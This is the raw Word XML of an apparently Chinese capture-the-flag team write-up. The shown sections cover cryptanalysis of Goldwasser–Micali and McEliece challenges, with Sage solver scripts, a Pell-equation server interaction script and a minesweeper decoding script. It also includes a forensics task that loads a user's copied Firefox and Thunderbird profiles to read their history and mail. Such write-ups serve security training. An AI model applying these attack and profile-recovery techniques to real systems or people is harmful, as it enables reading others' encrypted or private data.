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563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7223_WPSOffice_Type2"/>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
              <w:sz w:val="44"/>
              <w:szCs w:val="48"/>
            </w:rPr>
            <w:t>目录</w:t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_Toc7232_WPSOffice_Level1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5d31ca15-2adb-48c3-826b-257ab51bea3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b/>
                  <w:bCs/>
                </w:rPr>
                <w:t>C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rypto</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="1" w:name="_Toc7232_WPSOffice_Level1Page"/>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:t>2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_Toc17223_WPSOffice_Level2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64d46bf3-613c-4f20-822c-9e23e61e754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G</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:cstheme="majorBidi"/>
                </w:rPr>
                <w:t>M</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="2" w:name="_Toc17223_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>2</w:t>
          </w:r>
          <w:bookmarkEnd w:id="2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_Toc25211_WPSOffice_Level2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dfe632b7-a582-424a-bb9a-b9af65428f4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Mceliece</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="3" w:name="_Toc25211_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>2</w:t>
          </w:r>
          <w:bookmarkEnd w:id="3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_Toc27576_WPSOffice_Level2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249a51a9-2944-43eb-a35d-66ecd44f96f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P</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:cstheme="majorBidi"/>
                </w:rPr>
                <w:t>ell</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="4" w:name="_Toc27576_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>9</w:t>
          </w:r>
          <w:bookmarkEnd w:id="4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_Toc17223_WPSOffice_Level1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3b43fe4d-2142-4f78-aabd-d4d6ebeb7f3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b/>
                  <w:bCs/>
                </w:rPr>
                <w:t>M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isc</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="5" w:name="_Toc17223_WPSOffice_Level1Page"/>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:t>11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_Toc24935_WPSOffice_Level2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9d85a03a-554b-48ea-9242-465760e3b54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签到题</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="6" w:name="_Toc24935_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>11</w:t>
          </w:r>
          <w:bookmarkEnd w:id="6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_Toc14935_WPSOffice_Level2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28caf6f4-acd6-40fe-8ed5-ad1287f9ec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Minesweeper</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="7" w:name="_Toc14935_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>11</w:t>
          </w:r>
          <w:bookmarkEnd w:id="7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_Toc30461_WPSOffice_Level2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a827e24d-e20e-4bf2-b930-542f47c4aac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奇怪的组织</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="8" w:name="_Toc30461_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>11</w:t>
          </w:r>
          <w:bookmarkEnd w:id="8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_Toc19036_WPSOffice_Level2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a7dfaf04-57fc-4069-af0e-0fe63190ab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密码机器</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="9" w:name="_Toc19036_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>13</w:t>
          </w:r>
          <w:bookmarkEnd w:id="9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_Toc25211_WPSOffice_Level1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a19777fe-e6ce-4f54-a6a5-1b359b8512c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b/>
                  <w:bCs/>
                </w:rPr>
                <w:t>R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everse</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="10" w:name="_Toc25211_WPSOffice_Level1Page"/>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:t>14</w:t>
          </w:r>
          <w:bookmarkEnd w:id="10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b08a062d-d24f-4c72-94e7-a99bdce82ee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Game</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="11" w:name="_Toc21813_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>14</w:t>
          </w:r>
          <w:bookmarkEnd w:id="11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08ea3b9b-0669-4fb7-a098-4a15c1aa0f4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Enc</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="12" w:name="_Toc761_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>16</w:t>
          </w:r>
          <w:bookmarkEnd w:id="12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_Toc14128_WPSOffice_Level2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c3dc2d72-6981-4bdc-8556-3801d6e43f6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V</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:cstheme="majorBidi"/>
                </w:rPr>
                <w:t>M</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="13" w:name="_Toc14128_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>23</w:t>
          </w:r>
          <w:bookmarkEnd w:id="13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_Toc27576_WPSOffice_Level1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50588007-face-42c5-af36-a3e715e43c0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b/>
                  <w:bCs/>
                </w:rPr>
                <w:t>P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wn</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="14" w:name="_Toc27576_WPSOffice_Level1Page"/>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:t>24</w:t>
          </w:r>
          <w:bookmarkEnd w:id="14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_Toc10422_WPSOffice_Level2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41cd709e-d140-4759-bfb5-30d7733100b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MarksMan</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="15" w:name="_Toc10422_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>24</w:t>
          </w:r>
          <w:bookmarkEnd w:id="15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_Toc5525_WPSOffice_Level2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ae5b2da4-2517-48aa-88cb-9ad945d1f43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SecureBox</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="16" w:name="_Toc5525_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>25</w:t>
          </w:r>
          <w:bookmarkEnd w:id="16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b168cd33-803c-4373-8111-517074a2e39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Count</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="17" w:name="_Toc1749_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>27</w:t>
          </w:r>
          <w:bookmarkEnd w:id="17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_Toc22256_WPSOffice_Level2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a757852c-0a64-42eb-90b1-902c0249098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HAnsi" w:cstheme="majorBidi"/>
                </w:rPr>
                <w:t>E</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:hint="eastAsia" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:cstheme="majorBidi"/>
                </w:rPr>
                <w:t>ncnote</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="18" w:name="_Toc22256_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>27</w:t>
          </w:r>
          <w:bookmarkEnd w:id="18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_Toc24935_WPSOffice_Level1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237ba896-55c3-4f1b-acd3-0029dcfec21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b/>
                  <w:bCs/>
                </w:rPr>
                <w:t>W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eb</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="19" w:name="_Toc24935_WPSOffice_Level1Page"/>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:t>30</w:t>
          </w:r>
          <w:bookmarkEnd w:id="19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_Toc22715_WPSOffice_Level2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8b39e09a-6e59-4d0f-baeb-5e6149346d9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easy</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:cstheme="majorBidi"/>
                </w:rPr>
                <w:t>_login</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="20" w:name="_Toc22715_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>30</w:t>
          </w:r>
          <w:bookmarkEnd w:id="20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_Toc9205_WPSOffice_Level2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e41da6eb-5ef3-427e-a1f1-e67c7b37e1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just_escape</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="21" w:name="_Toc9205_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>32</w:t>
          </w:r>
          <w:bookmarkEnd w:id="21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_Toc7084_WPSOffice_Level2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634"/>
              <w:placeholder>
                <w:docPart w:val="{ae2f5868-c22f-4518-9850-be6dd4ba8b1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HAnsi" w:cstheme="majorBidi"/>
                </w:rPr>
                <w:t>baby</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:cstheme="majorBidi"/>
                </w:rPr>
                <w:t>upload</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:r>
            <w:tab/>
          </w:r>
          <w:bookmarkStart w:id="22" w:name="_Toc7084_WPSOffice_Level2Page"/>
          <w:r>
            <w:t>34</w:t>
          </w:r>
          <w:bookmarkEnd w:id="22"/>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:bookmarkEnd w:id="0"/>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc7232_WPSOffice_Level1"/>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rypto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/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24" w:name="_Toc17223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G</w:t>
      </w:r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</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/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拿到encrypt.py 发</w:t>
      </w:r>
      <w:bookmarkStart w:id="45" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="45"/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现其输出了N,phi,和密文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根据N和phi可以分解出p，q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查阅资料，可知这是Goldwasser–Micali cryptosystem（https://en.wikipedia.org/wiki/Goldwasser–Micali_cryptosystem），有了p,q，可以通过二次剩余判定进行解密</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC" w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0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解题脚本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC" w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0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见 GM_solve.sage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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25" w:name="_Toc25211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Mceliece</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/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题目给了一个mceliece 加密系统的实现，给了公钥和密文，需要还原明文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经过查找资料，可以找到破解mceliece的相关论文 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Stern, Jacques. A method for finding codewords of small weight. Coding theory and applications, Volume 388 of Lecture Notes in Computer Science, 1989.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提出了一种Stern Attack 可以攻破该系统。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编写SternsAlgorithm.sage 用Sage 实现这篇论文的攻击方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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编写solve.sage,用SternsAlgorithm还原明文，得到flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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，脚本如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/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SternsAlgorithm.sage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def _GetRandomPermutationMatrix(n):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 Set up the permutation matrix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rng = range(n); P = matrix(GF(2),n);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range(n):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 = floor(len(rng)*random());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P[i,rng[p]] = 1; rng=rng[:p]+rng[p+1:];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return copy(P);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def _GetColumnVectorWeight(n):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 = 0;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range(n.nrows()):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if n[i,0] == 1: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 = weight+1;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return weight;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def SternsAlgorithm(H, w, p, l):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H_Stern = copy(H);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codeword_found = false;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#Begin Stern's Algorithm for finding a weight-w codeword of the code generated by H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while (not codeword_found):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n_k = H_Stern.nrows();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k = H_Stern.ncols() - n_k;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I_n = identity_matrix(n_k);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singular = true;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P_Stern = 0; #initialize the permutation matrix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H_Prime = 0; #initialize the permuted parity-check matrix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#Search for (n-k) linearly independent columns.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while singular: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P_Stern = _GetRandomPermutationMatrix(H_Stern.ncols());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H_Prime = H_Stern*P_Stern; #permute the matrix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H_Prime.echelonize(); #row-reduce the first n-k columns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#If the selected n-k columns do not row-reduce, select a different combination of columns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if H_Prime.submatrix(0,0,n_k,n_k) == I_n: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singular = false;</w:t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#initialize and populate the set of n_k-l rows that will be deleted from H_Prime to leave l rows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Z = set();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while len(Z) &lt; n_k-l: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Z.add(randint(0,n_k-1)); #H.nrows()=n_k, but indices start at 0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Z = list(Z); Z.sort(); #Make Z a sorted list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#A copy of H_Prime with only the l selected rows (in Z) remaining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H_Prime_l = copy(H_Prime);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H_Prime_l = H_Prime_l.delete_rows(Z);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#Initialize the sets of indices of the columns of H_Prime_l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X_Indices = list(); Y_Indices = list();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#Assign a column indices to X or Y randomly (50/50 chance)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range(k):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if randint(0,1)==0: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X_Indices.append(i+n_k);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else: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Y_Indices.append(i+n_k);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#Generate the size-p subsets of X and Y,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#and initialize the lists containing each subset's sum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Subsets_of_X_Indices = Subsets(X_Indices,p);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Subsets_of_Y_Indices = Subsets(Y_Indices,p);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pi_A = list();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pi_B = list();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#Calculate pi(A) for each subset of X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range(Subsets_of_X_Indices.cardinality()):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column_sum = 0;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j in range(p):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column_sum = column_sum + H_Prime_l.submatrix(0,Subsets_of_X_Indices[i][j],H_Prime_l.nrows(),1);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pi_A.append(column_sum);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#Calculate pi(B) for each subset of Y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range(Subsets_of_Y_Indices.cardinality()):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column_sum = 0;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j in range(p):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column_sum = column_sum + H_Prime_l.submatrix(0,Subsets_of_Y_Indices[i][j],H_Prime_l.nrows(),1);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pi_B.append(column_sum);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weight_w_codeword = 0; #initialize the codeword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#Check each pi(A) value against every pi(B) value to check for collisions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range(len(pi_A)):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j in range(len(pi_B)):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#If a collision occurs, calculate the n-k - bit vector computed by summing the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#entirety of the columns whose indices are in A U B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if pi_A[i] == pi_B[j]:</w:t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sum = 0; #initialize the sum vector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k in (Subsets_of_X_Indices[i]):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sum = sum + H_Prime.submatrix(0,k,H_Prime.nrows(),1);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k in (Subsets_of_Y_Indices[j]):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sum = sum + H_Prime.submatrix(0,k,H_Prime.nrows(),1);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if _GetColumnVectorWeight(sum) == (w-2*p):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codeword_found = true;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#Since the sum vector has the appropriate weight, the codeword of weight w can now be calculated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#Initialize the codeword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weight_w_codeword = matrix(GF(2),H_Stern.ncols(),1);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#Mark the appropriate positions of the codeword as ones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index in range(n_k):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if sum[index,0]==1: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weight_w_codeword[index,0] = 1;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k in Subsets_of_X_Indices[i]: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weight_w_codeword[k,0] = 1;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k in Subsets_of_Y_Indices[j]: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weight_w_codeword[k,0] = 1;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#Undo the permuting done when selecting n-k linearly independent columns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weight_w_codeword = weight_w_codeword.transpose()*(~P_Stern);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return copy(weight_w_codeword);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:widowControl/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solve.sage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load("./SternsAlgorithm.sage")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def SternsAttack(PK, encrypted_message, t, p, l):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#Attacker has knowledge of PK and y (and presumably t), and is looking for a codeword of weight w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y = encrypted_message;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#Calculate a parity check matrix for the code G + {0,y}, where y = mG + e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 = (PK.stack(y)).right_kernel().basis_matrix();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 = t;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#Find a weight w codeword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weight_w_codeword = SternsAlgorithm(H, w, p, l);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#Decrypt the message using the codeword found via Stern's Algorithm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decrypted_message = PK.solve_left((y-weight_w_codeword));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return decrypted_message;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def encrypt(msg,crypto,l):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bin = BinaryStrings()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msg = map(int ,str(bin.encoding(msg)))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msg+=[0 for i in range(l-(len(msg)%l))]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assert(len(msg)%l == 0)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cipher = []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range(len(msg)/l):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plain = matrix(GF(2),1,l)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j in range(l):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plain[0,j] = msg[i*l+j]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encrypted = crypto.Encrypt(plain);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cipher.append(encrypted)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return cipher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def decrypt(cipher,crypto):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plain = ""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tmp = []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x in cipher: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decrypted = crypto.Decrypt(x)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tmp += [ x for x in decrypted[0]]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tmp += [0 for i in range(8-(len(tmp)%8))] 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print bin_to_ascii(tmp)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from sage.crypto.util import ascii_to_bin,bin_to_ascii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m = 6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n = 2**m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t = floor((2+(2**m-1)/m)/2);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pubkey = load("pubkey.sobj")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cipher = load("cipher.sobj")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plain = []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encrypted_message in cipher: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H = (pubkey.stack(encrypted_message)).right_kernel().basis_matrix();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 = 1;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k_2 = floor((H.ncols()-H.nrows())/2);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l_min = floor(log(k_2,2))-1;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for k in range(1):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l = l_min + k;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if (H.nrows() &lt; l):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l = H.nrows();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de = SternsAttack(pubkey,encrypted_message,t,p,l);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print de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plain+=de[0]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plain += [0 for i in range(8-(len(plain)%8))] </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:before="100" w:beforeAutospacing="1"/>
              <w:jc w:val="left"/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 w:cs="Helvetica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print bin_to_ascii(plain)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:widowControl/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26" w:name="_Toc27576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ell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="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查看服务器源代码，发现服务器会生成两个随机数a,b ，要求输入150对不同的正整数(x,y),使得满足等式</w:t>
      </w:r>
      <w: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x^2+a*y^2 =b</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="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这种形式的方程被称为佩尔方程（</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://en.wikipedia.org/wiki/Pell%27s_equation%EF%BC%89%E3%80%82%E6%B1%82%E8%A7%A3%E4%BD%A9%E5%B0%94%E6%96%B9%E7%A8%8B%E7%9A%84%E4%B8%80%E8%88%AC%E6%96%B9%E6%B3%95%E8%A7%81" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC" w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>https://en.wikipedia.org/wiki/Pell's_equation）。求解佩尔方程的一般方法见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC" w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC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Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC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instrText xml:space="preserve"> HYPERLINK "http://www.irishmathsoc.org/bull54/M5403.pdf" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC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9"/>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC" w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>http://www.irishmathsoc.org/bull54/M5403.pdf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC" w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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当b=1时，解佩尔方法的一种较快的方法是用连分数法（</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://en.wikipedia.org/wiki/Continued_fraction%EF%BC%89%EF%BC%8C%E4%BD%86%E6%98%AF%E5%BD%93a%E6%AF%94%E8%BE%83%E5%A4%A7%E6%97%B6%EF%BC%8C%E8%BF%9E%E5%88%86%E6%95%B0%E5%A4%8D%E6%9D%82%E5%BA%A6%E6%AF%94%E8%BE%83%E9%AB%98" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC" w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>https://en.wikipedia.org/wiki/Continued_fraction），但是当a比较大时，连分数复杂度比较高</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC" w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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此外佩尔方程的解还满足递推关系</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720"/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x_{n + 1} = a * x_{n} + b * D * y_{n}</w:t>
      </w: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y_{n + 1} = b * x_{n} + a * y_{n}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="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所以对连分数法做了个优化，用连分数发得到前两组较小的解，然后可以求出这些解的递推公式的参数，然后根据递推公式去求后续的解。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="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hint="eastAsia"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用sagemath实现了上述求解佩尔方程的算法，并与服务器交互即可得到flag。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import sys,string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hashlib import sha256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sys.path.append("/usr/local/lib/python2.7/dist-packages/")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sage.all import *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pwn import *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context.log_level = "debug"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 = remote("</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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x</w:t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",11111)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pofw():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con.recvuntil("+")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msg=con.recvuntil(")",drop =True)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con.recvuntil("== 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dig=con.recvline().strip()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ans=util.iters.bruteforce(lambda x:sha256(x+msg).hexdigest()==dig,string.ascii_letters+string.digits,length=4)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con.sendlineafter("X:",ans)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solve_pell(N, c,begin, most=10000):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# solve x ** 2 - N * y ** 2 == c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cf = continued_fraction(sqrt(N))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for i in range(begin,most):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denom = cf.denominator(i)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numer = cf.numerator(i)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if numer ** 2 - N * denom ** 2 == c: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    return numer, denom,i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None, None,None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pofw()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con.recvline()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con.recvuntil("a = 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 = int(con.recvuntil(",",drop=True))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con.recvuntil("b = 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 = int(con.recvline().strip())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d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c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x1,y1,trys = solve_pell(d,c,0)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not x1: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exit()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x2,y2,trys = solve_pell(d,c,trys+1)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x1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y1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x2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y2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con.sendline(str(x1))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con.sendline(str(y1))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var('a b')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m = solve([x2 == a*x1+b*d*y1,y2 == b*x1+a*y1],[a,b])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a = m[0][0].right()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 = m[0][1].right()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x,y = x1,y1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range(149):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x,y = a*x+b*d*y, b*x+a*y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con.sendline(str(x))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sleep(0.5)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con.sendline(str(y))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sleep(0.5)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con.interactive()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc17223_WPSOffice_Level1"/>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>isc</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/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28" w:name="_Toc24935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签到题</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/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打开题目页面，任意敲击，即会出现flag：</w:t>
      </w:r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77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但不能复制或者鼠标右键菜单，可通过浏览器菜单栏调出开发者工具，复制flag。</w:t>
      </w:r>
    </w:p>
    <w:p/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29" w:name="_Toc14935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Minesweeper</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/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通过三关游戏，得到三个字符串并拼接（FLOAT_STRING）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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再将浮点数转换为字符串可得flag，脚本如下：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import sys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import numpy as np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flagstr = sys.argv[1]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flag = flagstr.split(" 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i in flag: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print(chr(int(np.round(float(i)*256))),end = "")</w:t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0" w:name="_Toc30461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奇怪的组织</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/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首先找到用户应用数据目录下存在的Firefox和Thunderbird配置文件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自己下载一个Firefox和Thunderbird，将这些配置文件覆盖自己的配置文件，可以使用-p指定或者修改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profile.ini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将proflies里的文件保存到自己电脑里的相应位置（根据windows或者mac系统路劲有差异，但文件是通用的）这里有两个profiles的文件夹，都尝试一下，修改profile.ini，使默认的配置文件用我们刚才拷过来的那个。Firefox使用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hn0lxrho.default-release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之后，打开即可以看到之前用户的浏览行为了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打开Firefox，可以看到之前用户的浏览记录了，找到emojiwiki的网页，此时用户正在浏览</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Apple Color Emoji" w:hAnsi="Apple Color Emoji" w:eastAsia="Songti SC" w:cs="Apple Color Emoji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🐉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这个emoji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用同样的办法，打开Thunderbird，配置文件是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7ev2i8k4.default-release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,可以看到有一堆邮件，我们按照时间顺序从早到晚来还原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将重点的聊天内容还原</w:t>
      </w:r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162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按照对话提示，我们需要去找到一个真实姓名，在</w:t>
      </w:r>
      <w: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奇怪的组织/Users/bob/Pictures/Camera Roll/sdcard/Android/data/com.android.backup</w:t>
      </w:r>
      <w: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 目录下可以发现一个通讯录的导出文件，找到邮箱号为</w:t>
      </w:r>
      <w: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rjddd321@protonmail.com</w:t>
      </w:r>
      <w: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的通讯人，真实姓名是</w:t>
      </w:r>
      <w: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matachuan</w:t>
      </w:r>
      <w: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，使用这个key在</w:t>
      </w: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instrText xml:space="preserve"> HYPERLINK "https://aghorler.github.io/emoji-aes/" </w:instrText>
      </w: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9"/>
          <w:rFonts w:ascii="Songti SC" w:hAnsi="Songti SC" w:eastAsia="Songti SC" w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
